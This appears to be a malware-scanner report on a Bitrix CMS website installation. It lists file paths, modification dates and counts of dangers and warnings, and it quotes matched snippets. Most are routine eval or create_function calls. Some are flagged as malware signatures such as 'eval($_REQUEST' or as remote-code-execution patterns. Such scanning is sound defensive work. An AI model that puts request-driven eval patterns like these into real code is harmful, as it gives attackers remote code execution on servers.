|
/var/www/allstarsO/allstars.ua/bitrix/admin/cat_product_admin.php Size: 129.00 B Created: 2023-03-11 16:37:11 Modified: 2023-11-27 14:52:55 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/admin/cat_product_edit.php Size: 128.00 B Created: 2023-03-11 16:37:11 Modified: 2023-11-27 14:52:55 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/tools/vote_chart.php Size: 411.00 B Created: 2023-03-11 16:37:09 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/idea/install/components/bitrix/idea.popup/templates/.default/bitrix/idea.edit/light/template.php Size: 6.83 kB Created: 2023-03-11 16:40:38 Modified: 2023-11-27 14:53:25 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/idea/install/components/bitrix/idea.edit/templates/.default/template.php Size: 9.35 kB Created: 2023-03-11 16:40:38 Modified: 2023-11-27 14:53:25 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/idea/install/components/bitrix/idea.comment.list/templates/official_detail/template.php Size: 15.79 kB Created: 2023-03-11 16:40:39 Modified: 2023-11-27 14:53:25 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/idea/install/components/bitrix/idea.comment.list/templates/.default/template.php Size: 18.98 kB Created: 2023-03-11 16:40:39 Modified: 2023-11-27 14:53:25 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/idea/install/components/bitrix/idea.comment.list/templates/official_list/template.php Size: 15.86 kB Created: 2023-03-11 16:40:39 Modified: 2023-11-27 14:53:25 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/iblock/lib/model/section.php Size: 1.02 kB Created: 2023-03-11 16:41:08 Modified: 2023-11-27 14:53:25 Warns: 1
| Description | Match |
|---|
Function eval Line: 40 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($entity)
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/iblock/classes/general/subelement.php Size: 50.47 kB Created: 2023-03-11 16:41:08 Modified: 2023-11-27 14:53:25 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(\''.CUtil::JSEscape($this->onLoadScript).'\');'; echo '</script></body></html>'; } else { if($this->onLoadScript) echo '<script type="text/javascript">'.$this->onLoadScript.'</script>'; echo $string; } define("ADMIN_AJAX_MODE", true); require($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/epilog_admin_after.php"); die(); } elseif ($_REQUEST["mode"]=='excel') { header("Content-Type: application/vnd.ms-excel"); header("Content-Disposition: filename=".basename($APPLICATION->GetCurPag...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/iblock/admin/iblock_element_edit.php Size: 114.58 kB Created: 2023-03-11 16:41:08 Modified: 2023-11-27 14:53:25 Dangers: 6
|
/var/www/allstarsO/allstars.ua/bitrix/modules/iblock/admin/iblock_subelement_generator.php Size: 28.34 kB Created: 2023-03-11 16:41:08 Modified: 2023-11-27 14:53:25 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(arFileProperties),
id = 0;
if(BX('ib_seg_max_property_id'))
{
id = BX('ib_seg_max_property_id').value;
if(id >= obPropertyTable.AR_FILE_PROPERTIES.length + 2)
{
return;
}
BX('ib_seg_max_property_id').value = Number(BX('ib_seg_max_property_id').value) + 1;
}
obPropertyTable.SELECTED_PROPERTIES[id] = 'DETAIL';
var propertySpan = BX('ib_seg_property_span');
if(propertySpan)
{
var options = [];
for(var key in fileProperties)
{
if(fileProperties....
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/iblock/admin/iblock_subelement_edit.php Size: 69.28 kB Created: 2023-03-11 16:41:08 Modified: 2023-11-27 14:53:25 Dangers: 5
|
/var/www/allstarsO/allstars.ua/bitrix/modules/iblock/install/components/bitrix/catalog.section/component.php Size: 50.92 kB Created: 2023-03-11 16:41:23 Modified: 2023-11-27 14:53:25 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 323 Dangerous Malware Signature (hash: 11413268) |
eval($_REQUEST
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/iblock/install/components/bitrix/catalog.link.list/component.php Size: 1.14 kB Created: 2023-03-11 16:41:09 Modified: 2023-11-27 14:53:25 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 19 Warning Double var technique is usually used for the obfuscation of malicious code |
${$FN}
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/iblock/install/components/bitrix/catalog.element/component.php Size: 49.25 kB Created: 2023-03-11 16:41:20 Modified: 2023-11-27 14:53:25 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 284 Dangerous Malware Signature (hash: 11413268) |
eval($_REQUEST
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/iblock/install/components/bitrix/catalog.element/templates/.default/template.php Size: 64.84 kB Created: 2023-03-11 16:41:20 Modified: 2023-11-27 14:53:25 Dangers: 1
| Description | Match |
|---|
Exploit clever_include Line: 1114 Dangerous LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine |
INCLUDE' => $arParams['PRICE_VAT_INCLUDE'],
'CONVERT_CURRENCY' => $arParams['CONVERT_CURRENCY'],
'BASKET_URL' => $arParams['BASKET_URL'],
'ADD_PROPERTIES_TO_BASKET' => $arParams['ADD_PROPERTIES_TO_BASKET'],
'PRODUCT_PROPS_VARIABLE' => $arParams['PRODUCT_PROPS_VARIABLE'],
'PARTIAL_PRODUCT_PROPERTIES' => $arParams['PARTIAL_PRODUCT_PROPERTIES'],
'USE_PRODUCT_QUANTITY' => 'N',
'PRODUCT_QUANTITY_VARIABLE' => $arParams['PRODUCT_QUANTITY_VARIABLE'...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/iblock/install/components/bitrix/rss.show/component.php Size: 2.52 kB Created: 2023-03-11 16:41:24 Modified: 2023-11-27 14:53:25 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('&$val, $key', '$val=htmlspecialcharsex($val);')); elseif($arParams["PROCESS"] == "TEXT") array_walk_recursive($arResult, create_function('&$val, $key', '$val=str_replace(array(" ", "\\r\\n"), array(" ", "<br>"), HTMLToTxt($val));')); $this->IncludeComponentTemplate()
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/iblock/install/components/bitrix/catalog.top/component.php Size: 32.33 kB Created: 2023-03-11 16:41:14 Modified: 2023-11-27 14:53:25 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 234 Dangerous Malware Signature (hash: 11413268) |
eval($_REQUEST
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/iblock/install/components/bitrix/catalog/templates/.default/section.php Size: 2.44 kB Created: 2023-03-11 16:41:16 Modified: 2023-11-27 14:53:25 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/iblock/install/components/bitrix/catalog.filter/component.php Size: 32.43 kB Created: 2023-03-11 16:41:19 Modified: 2023-11-27 14:53:25 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 61 Warning Double var technique is usually used for the obfuscation of malicious code |
${$FILTER_NAME}
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/iblock/install/components/bitrix/catalog.comments/templates/.default/bitrix/blog.post.comment/adapt/scripts_for_editor.php Size: 14.80 kB Created: 2023-03-11 16:41:09 Modified: 2023-11-27 14:53:25 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(scripts[s].JS);
}
}
BX.ajax.processScripts(scripts, true);
// commentEr object may be set in template
if(window.commentEr && window.commentEr == "Y")
{
BX('err_comment_'+this.id[1]).innerHTML = data;
}
else
{
if(BX('edit_id').value > 0)
{
var commentId = 'blg-comment-'+this.id[1];
if(BX(commentId))
{
var newComment = BX.create('div',{'html':data}); // tmp container for data
// paste resp...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/iblock/install/components/bitrix/catalog.comments/templates/.default/bitrix/blog.post.comment/adapt/template.php Size: 31.88 kB Created: 2023-03-11 16:41:09 Modified: 2023-11-27 14:53:25 Dangers: 3
|
/var/www/allstarsO/allstars.ua/bitrix/modules/iblock/install/components/bitrix/catalog.smart.filter/component.php Size: 27.65 kB Created: 2023-03-11 16:41:20 Modified: 2023-11-27 14:53:25 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 523 Warning Double var technique is usually used for the obfuscation of malicious code |
${$FILTER_NAME}
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/iblock/install/components/bitrix/catalog.sections.top/component.php Size: 19.13 kB Created: 2023-03-11 16:41:24 Modified: 2023-11-27 14:53:25 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 180 Dangerous Malware Signature (hash: 11413268) |
eval($_REQUEST
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/advertising/classes/general/advertising.php Size: 139.93 kB Created: 2023-03-11 16:42:02 Modified: 2023-11-27 14:53:20 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function("&\$item", "\$item=intval(\$item);")); $arrHour = array_unique($arrHour); foreach($arrHour as $hour) { if ($hour>=0 && $hour<=23) { $strSql = "INSERT INTO b_adv_contract_2_weekday (CONTRACT_ID, C_WEEKDAY, C_HOUR) VALUES (".$CONTRACT_ID.", '".$DB->ForSql($weekday, 10)."', ".$hour.")"; $DB->Query($strSql, false, $err_mess.__LINE__); } } } } } } } } if (in_array("arrUSER_VIEW", $arrKeys)) { CAdvContract::DeleteUserLink($CONTRACT_ID, " and PERMISSION = 'VIEW'"); if (is_array($arField...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/advertising/admin/adv_legend.php Size: 1.10 kB Created: 2023-03-11 16:42:03 Modified: 2023-11-27 14:53:20 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/advertising/admin/adv_banner_graph.php Size: 13.32 kB Created: 2023-03-11 16:42:03 Modified: 2023-11-27 14:53:20 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/advertising/admin/adv_banner_diagram.php Size: 12.61 kB Created: 2023-03-11 16:42:03 Modified: 2023-11-27 14:53:20 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/advertising/admin/adv_graph.php Size: 6.72 kB Created: 2023-03-11 16:42:03 Modified: 2023-11-27 14:53:20 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/advertising/admin/adv_diagram.php Size: 2.01 kB Created: 2023-03-11 16:42:03 Modified: 2023-11-27 14:53:20 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/advertising/admin/adv_contract_diagram.php Size: 9.18 kB Created: 2023-03-11 16:42:03 Modified: 2023-11-27 14:53:20 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/advertising/admin/adv_contract_graph.php Size: 11.44 kB Created: 2023-03-11 16:42:03 Modified: 2023-11-27 14:53:20 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/advertising/install/index.php Size: 7.93 kB Created: 2023-03-11 16:42:02 Modified: 2023-11-27 14:53:20 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sender/options.php Size: 7.47 kB Created: 2023-03-11 16:40:41 Modified: 2023-11-27 14:53:29 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 46 Warning Double var technique is usually used for the obfuscation of malicious code |
${$name}
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sender/install/index.php Size: 11.21 kB Created: 2023-03-11 16:40:41 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/mobileapp/install/components/bitrix/mobileapp.menu/templates/.default/template.php Size: 12.57 kB Created: 2023-03-11 16:40:45 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec("showAuthForm");
}
}
<?endif;?>
if(BX.PULL)
{
BX.addCustomEvent("onPullExtendWatch", function(data) {
BX.PULL.extendWatch(data.id);
});
BX.addCustomEvent("thisPageWillDie", function(data) {
BX.PULL.clearWatch(data.page_id);
});
BX.addCustomEvent("onPullEvent", function (module_id, command, params)
{
if (module_id == 'main' && (command == 'user_authorize' || command == 'user_logout' || command == 'online_list'))
{
//app.onCustomEvent('onPullOnline', {...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/blog/general/blog_user.php Size: 23.00 kB Created: 2023-03-11 16:43:13 Modified: 2023-11-27 14:53:23 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function("&\$item", "\$item=IntVal(\$item);")); $dbUserGroups = CBlogUserGroup::GetList( array(), array("ID" => $arGroups, "BLOG_ID" => $blogID), false, false, array("ID") ); $arGroups = array(); while ($arUserGroup = $dbUserGroups->Fetch()) $arGroups[] = IntVal($arUserGroup["ID"]); if ($action == BLOG_ADD) $arCurrentGroups = CBlogUser::GetUserGroups($ID, $blogID, "", $selectType); foreach($arGroups as $val) { if ($val != 1 && $val != 2) { if ($action == BLOG_CHANGE || $action == BLOG_ADD...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/blog/general/blog.php Size: 62.20 kB Created: 2023-03-11 16:43:13 Modified: 2023-11-27 14:53:23 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function("&\$item", "\$item=IntVal(\$item);")); $vals = array_unique($vals); $val = implode(",", $vals); if (count($vals) <= 0) $arSqlSearch_tmp[] = "(1 = 2)"; else $arSqlSearch_tmp[] = (($strNegative == "Y") ? " NOT " : "")."(".$arFields[$key]["FIELD"]." IN (".$val."))"; } elseif ($arFields[$key]["TYPE"] == "double") { array_walk($vals, create_function("&\$item", "\$item=DoubleVal(\$item);")); $vals = array_unique($vals); $val = implode(",", $vals); if (count($vals) <= 0) $arSqlSearch_tm...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/blog/install/components/bitrix/blog.post.edit/templates/.default/template.php Size: 21.58 kB Created: 2023-03-11 16:43:35 Modified: 2023-11-27 14:53:23 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/blog/install/components/bitrix/blog.post.edit/templates/.default/script.php Size: 26.06 kB Created: 2023-03-11 16:43:35 Modified: 2023-11-27 14:53:23 Warns: 1
| Description | Match |
|---|
Function eval Line: 140 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(thetag + "_open");
if (tagOpen == 0)
{
if (doInsert("[" + thetag + "]", "[/" + thetag + "]", true))
{
eval(thetag + "_open = 1");
// Change the button status
pushstack(bbtags, thetag);
cstat();
}
}
else
{
// Find the last occurance of the opened tag
lastindex = 0;
for (i = 0 ; i < bbtags.length; i++ )
{
if ( bbtags[i] == thetag )
{
lastindex = i;
}
}
// Close all tags opened up to that tag was opened
while (bbtags[lastindex])
{
tagR...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/blog/install/components/bitrix/blog.post.edit/templates/micro/template.php Size: 5.14 kB Created: 2023-03-11 16:43:34 Modified: 2023-11-27 14:53:23 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/blog/install/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.edit/.default/template.php Size: 23.87 kB Created: 2023-03-11 16:43:19 Modified: 2023-11-27 14:53:23 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/blog/install/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.edit/.default/script.php Size: 22.93 kB Created: 2023-03-11 16:43:19 Modified: 2023-11-27 14:53:23 Warns: 1
| Description | Match |
|---|
Function eval Line: 97 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(thetag + "_open");
if (tagOpen == 0)
{
if (doInsert("[" + thetag + "]", "[/" + thetag + "]", true))
{
eval(thetag + "_open = 1");
// Change the button status
pushstack(bbtags, thetag);
cstat();
}
}
else
{
// Find the last occurance of the opened tag
lastindex = 0;
for (i = 0 ; i < bbtags.length; i++ )
{
if ( bbtags[i] == thetag )
{
lastindex = i;
}
}
// Close all tags opened up to that tag was opened
while (bbtags[lastindex])
{
tagR...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/blog/install/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.comment/.default/template.php Size: 21.46 kB Created: 2023-03-11 16:43:18 Modified: 2023-11-27 14:53:23 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/blog/install/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.comment/.default/script.php Size: 11.35 kB Created: 2023-03-11 16:43:18 Modified: 2023-11-27 14:53:23 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(thetag + "_open");
if (tagOpen == 0)
{
if (doInsert("[" + thetag + "]", "[/" + thetag + "]", true))
{
eval(thetag + "_open = 1");
// Change the button status
pushstack(bbtags, thetag);
cstat();
}
}
else
{
// Find the last occurance of the opened tag
lastindex = 0;
for (i = 0 ; i < bbtags.length; i++ )
{
if ( bbtags[i] == thetag )
{
lastindex = i;
}
}
// Close all tags opened up to that tag was opened
while (bbtags[lastindex])
{
tagR...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/blog/install/components/bitrix/blog/templates/one_blog_old_version/bitrix/blog.post.edit/.default/template.php Size: 25.44 kB Created: 2023-03-11 16:43:16 Modified: 2023-11-27 14:53:23 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/blog/install/components/bitrix/blog/templates/one_blog_old_version/bitrix/blog.post.comment/.default/template.php Size: 21.68 kB Created: 2023-03-11 16:43:16 Modified: 2023-11-27 14:53:23 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/blog/install/components/bitrix/blog.post.comment/templates/.default/scripts_for_editor.php Size: 15.88 kB Created: 2023-03-11 16:43:30 Modified: 2023-11-27 14:53:23 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(scripts[s].JS);
}
}
BX.ajax.processScripts(scripts, true);
// commentEr object may be set in template
if(window.commentEr && window.commentEr == "Y")
{
BX('err_comment_'+this.id[1]).innerHTML = data;
}
else
{
if(BX('edit_id').value > 0)
{
var commentId = 'blg-comment-'+this.id[1];
if(BX(commentId))
{
var newComment = BX.create('div',{'html':data}); // tmp container for data
//...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/blog/install/components/bitrix/blog.post.comment/templates/.default/template.php Size: 33.53 kB Created: 2023-03-11 16:43:30 Modified: 2023-11-27 14:53:23 Dangers: 3
|
/var/www/allstarsO/allstars.ua/bitrix/modules/blog/install/components/bitrix/blog.popular_blogs/component.php Size: 5.77 kB Created: 2023-03-11 16:43:31 Modified: 2023-11-27 14:53:23 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'if($a["VIEWS"] == $b["VIEWS"]) { if($a["NUM_COMMENTS"] < $b["NUM_COMMENTS"]) return 1; elseif($a["NUM_COMMENTS"] > $b["NUM_COMMENTS"]) return -1; else return 0;} return ($a["VIEWS"] < $b["VIEWS"])? 1 : -1;')); $i = 0; foreach($arBlogs as $blogID => $info) { if($i >= $arParams["BLOG_COUNT"] && IntVal($arParams["BLOG_COUNT"]) > 0) continue; $arBlog = CBlog::GetByID($blogID); $arBlog = CBlogTools::htmlspecialcharsExArray($arBlog); $arBlog["BlogUser"] = CBlogUser::GetByID(...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/blog/install/index.php Size: 19.61 kB Created: 2023-03-11 16:43:35 Modified: 2023-11-27 14:53:23 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/compression/include.php Size: 3.23 kB Created: 2023-03-11 16:43:35 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/bizproc/classes/general/document.php Size: 48.79 kB Created: 2023-03-11 16:38:41 Modified: 2023-11-27 14:53:22 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/bizproc/classes/general/documentservice.php Size: 37.73 kB Created: 2023-03-11 16:38:41 Modified: 2023-11-27 14:53:22 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("v = " + v);
return v;
}
$objectName.GetFieldInputControl4Type = function(type, value, name, subtypeFunctionName, func)
{
this.GetFieldInputControlInternal(
type,
value,
name,
function(v)
{
var p = v.indexOf('<!--__defaultOptionsValue:');
if (p >= 0)
{
p = p + '<!--__defaultOptionsValue:'.length;
var p1 = v.indexOf('-->', p);
type['Options'] = v.substring(p, p1);
}
var newPromt = "";
p = v.indexOf('<!--__modifyOptionsPromt:');
if (p >= 0)
...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/bizproc/classes/general/virtualdocument.php Size: 66.81 kB Created: 2023-03-11 16:38:41 Modified: 2023-11-27 14:53:22 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(this.arUserTypes[type.substr(2)] + "(\"" + field + "\", \"" + value + "\")");
//}
else // type == "S"
{
s += '<input type="text" size="40" id="id_' + field + '" name="' + inputName + '" value="' + this.HtmlSpecialChars(value) + '">';
}
if (bAddSelection)
s += '<br /><input type="text" id="id_' + field + '" name="' + inputName + '" value="' + this.HtmlSpecialChars(value) + '">';
if (bAddButton && showAddButton)
s += '<input type="button" value="..." onclick="B...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/bizproc/classes/general/runtime.php Size: 19.79 kB Created: 2023-03-11 16:38:41 Modified: 2023-11-27 14:53:22 Warns: 2
| Description | Match |
|---|
Exploit double_var2 Line: 465 Warning Double var technique is usually used for the obfuscation of malicious code |
${$key}
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('class CBP'.static::REST_ACTIVITY_PREFIX.$code.' extends CBPRestActivity {const REST_ACTIVITY_ID = '.($activity? $activity['ID'] : 0).';}'); $this->arLoadedActivities[] = static::REST_ACTIVITY_PREFIX.$code; return true; } return false; } public function GetActivityDescription($code, $lang = false) { if (preg_match("#[^a-zA-Z0-9_]#", $code)) return null; if (strlen($code) <= 0) return null; $code = strtolower($code); if (substr($code, 0, 3) == "cbp") $code = substr($code, 3); if (strlen($cod...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/bizproc/classes/general/trackingservice.php Size: 9.58 kB Created: 2023-03-11 16:38:41 Modified: 2023-11-27 14:53:22 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function( '$matches', 'return CBPAllTrackingService::parseStringParameterMatches($matches, array("'.$documentType[0].'", "'.$documentType[1].'", "'.$documentType[2].'"));' ), $string ); } public static function parseStringParameterMatches($matches, $documentType = null) { $result = ""; $documentType = is_array($documentType) ? array_filter($documentType) : null; if ($matches[1] == "user") { $user = $matches[2]; $l = strlen("user_"); if (substr($user, 0, $l) == "user_") { $result = CBPHelp...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/bizproc/install/activities/bitrix/codecondition/codecondition.php Size: 1.82 kB Created: 2023-03-11 16:38:31 Modified: 2023-11-27 14:53:22 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit silenced_eval Line: 16 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine |
@eval("\$result = ".$this->condition.";")
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("\$result = ".$this->condition.";"); return $result; } public static function ValidateProperties($value = null, CBPWorkflowTemplateUser $user = null) { $arErrors = array(); if ($user == null || !$user->isAdmin()) { $arErrors[] = array( "code" => "perm", "message" => GetMessage("BPCC_NO_PERMS"), ); } return array_merge($arErrors, parent::ValidateProperties($value, $user)); } public static function GetPropertiesDialog($documentType, $arWorkflowTemplate, $arWorkflowParameters, $arWorkflowVaria...
| Sign 696317c4 Line: 16 Dangerous Malware Signature (hash: 696317c4) |
@eval("\
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/bizproc/install/activities/bitrix/codeactivity/codeactivity.php Size: 2.46 kB Created: 2023-03-11 16:38:35 Modified: 2023-11-27 14:53:22 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit silenced_eval Line: 16 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine |
@eval($this->ExecuteCode)
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($this->ExecuteCode); return CBPActivityExecutionStatus::Closed; } public static function ValidateProperties($arTestProperties = array(), CBPWorkflowTemplateUser $user = null) { $arErrors = array(); if ($user == null || !$user->isAdmin()) { $arErrors[] = array( "code" => "perm", "message" => GetMessage("BPCA_NO_PERMS"), ); } if (strlen($arTestProperties["ExecuteCode"]) <= 0) { $arErrors[] = array( "code" => "emptyCode", "message" => GetMessage("BPCA_EMPTY_CODE"), ); } return array_merge($arE...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/bizproc/install/index.php Size: 7.59 kB Created: 2023-03-11 16:38:41 Modified: 2023-11-27 14:53:22 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/search/default_option.php Size: 714.00 B Created: 2023-03-11 16:40:51 Modified: 2023-11-27 14:53:29 Dangers: 1
| Description | Match |
|---|
Sign b236d073 Line: 4 Dangerous Malware Signature (hash: b236d073) |
/*;*/
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/perfmon/admin/perfmon_db_server.php Size: 31.96 kB Created: 2023-03-11 16:40:50 Modified: 2023-11-27 14:53:28 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/perfmon/admin/perfmon_row_edit.php Size: 15.52 kB Created: 2023-03-11 16:40:50 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return ".$tokens[$pos][1].";"); $pos++; } elseif ($tokens[$pos][0] === T_LNUMBER || $tokens[$pos][0] === T_DNUMBER || $tokens[$pos][0] === T_CONSTANT_ENCAPSED_STRING) { $result = eval("return ".$tokens[$pos][1].";"); $pos++; } elseif ($tokens[$pos][0] === T_ARRAY) { $pos++; while (isset($tokens[$pos]) && $tokens[$pos][0] === T_WHITESPACE) $pos++; if ($tokens[$pos][0] !== "(") return; else $pos++; $result = array(); while (true) { while (isset($tokens[$pos]) && $tokens[$pos][0] === T_WHITES...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/options.php Size: 3.84 kB Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/classes/mysql/slave.php Size: 11.86 kB Created: 2023-03-11 16:42:58 Modified: 2023-11-27 14:53:24 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/classes/mysql/dbnode_check.php Size: 26.23 kB Created: 2023-03-11 16:42:58 Modified: 2023-11-27 14:53:24 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/classes/mysql/dbnode.php Size: 1.89 kB Created: 2023-03-11 16:42:58 Modified: 2023-11-27 14:53:24 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/classes/general/memcache_cache.php Size: 4.68 kB Created: 2023-03-11 16:42:58 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/classes/general/memcache.php Size: 6.95 kB Created: 2023-03-11 16:42:58 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/classes/general/dbnode.php Size: 8.97 kB Created: 2023-03-11 16:42:58 Modified: 2023-11-27 14:53:24 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/admin/menu.php Size: 3.74 kB Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/admin/cluster_slave_list.php Size: 10.58 kB Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/admin/cluster_slave_edit.php Size: 6.17 kB Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/admin/cluster_memcache_list.php Size: 7.47 kB Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/admin/cluster_server_list.php Size: 2.79 kB Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/admin/cluster_dbnode_edit.php Size: 6.84 kB Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/include.php Size: 1.76 kB Created: 2023-03-11 16:42:56 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.master_add/wizard.php Size: 9.08 kB Created: 2023-03-11 16:42:58 Modified: 2023-11-27 14:53:24 Dangers: 2
|
